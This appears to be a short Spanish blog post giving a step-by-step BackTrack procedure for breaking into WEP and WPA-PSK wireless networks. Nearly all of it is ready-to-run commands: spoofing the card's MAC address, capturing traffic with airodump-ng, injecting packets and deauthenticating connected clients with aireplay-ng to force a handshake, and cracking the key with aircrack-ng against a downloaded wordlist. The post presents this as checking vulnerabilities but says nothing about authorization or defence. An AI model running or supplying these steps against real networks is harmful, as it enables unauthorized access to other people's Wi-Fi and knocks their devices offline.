Utilizar BackTrack. Comprobar vulnerabilidades en Redes Wireless (WEP, WPA-PSK).
Conectar la tarjeta de Red y cargar el modulo de la tarjeta (dependera del Chipset de su tarjeta wireless).
lsmod para ver los modulos rmmod y modprobe para cargar y descargar modulos.
root@syslinux~# modprobe rt073usb
- comprobar interface con ifconfig
- poner en modo monitor
root@syslinux~# iwconfig rausb0 mode monitor
- desactivar interface
root@syslinux~# ifconfig rausb0 down
- cambiar MAC de la tarjeta
root@syslinux~# macchanger -m 00:55:44:33:22:11 rausb0
- levantar interface
root@syslinux~# ifconfig rausb0 up
- listar redes al alcance de mi tarjeta wireless
root@syslinux~# airodump-ng rausb0
- Elegir objetivo. Ctrl+c (para detener el scaneo de redes)
- capturar en un solo canal y guardar en archivo
root@syslinux~# airodump-ng rausb0 -w archivo -c channel
- mientras airodump captura paquetes abrimos otra Consola para inyectar paquetes y aumentar el trafico.
- si esta asociado.
root@syslinux~# aireplay-ng -1 0 -e SSID -a macobjetivo -h macstation rausb0
- autenticarse - asociarse (mi mac cambiada)
root@syslinux~# aireplay-ng -1 0 -e SSID -a macobjetivo -h 00:11:22:33:44:55 rausb0
- inyectar paquetes utilizando cliente falso
root@syslinux~# aireplay-ng -3 -b macobjetivo -h 00:11:22:33:44:55 rausb0
- inyectar paquetes utilizando station
root@syslinux~# aireplay-ng -3 -b macobjetivo -h macstation rausb0
Algunos puntos de acceso requieren reasociarse cada 20 segundos, si no el falso cliente se considera desconectado. Asociarse cada 20 segundos.
aireplay-ng -1 20 -e WLAN_13 -b macobjetivo -h maccambiada rausb0
- en este punto la captura de pqtes en airodump-ng debe aumentar
- desautenticando clientes para obligarles a reasociarse
- WPA Handshake capture.
root@syslinux~# aireplay-ng -0 5 -a macobjetivo -c macstation rausb0
- si aun no funciona
root@syslinux~# aireplay-ng -0 10 -a macobjetivo rausb0
- Buscar la clave con aircrack-ng
- aircrack-ng archivo*.cap
- Ataque de diccionario (aircrack-ng) WPA-PSK
- Descargar diccionarios http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
- Crear diccionario
root@syslinux~# zcat all.gz | egrep -v '^#' > dic
- Utilizar diccionario
root@syslinux~# aircrack-ng -w dic -0 archivo*.cap
No hay comentarios:
Publicar un comentario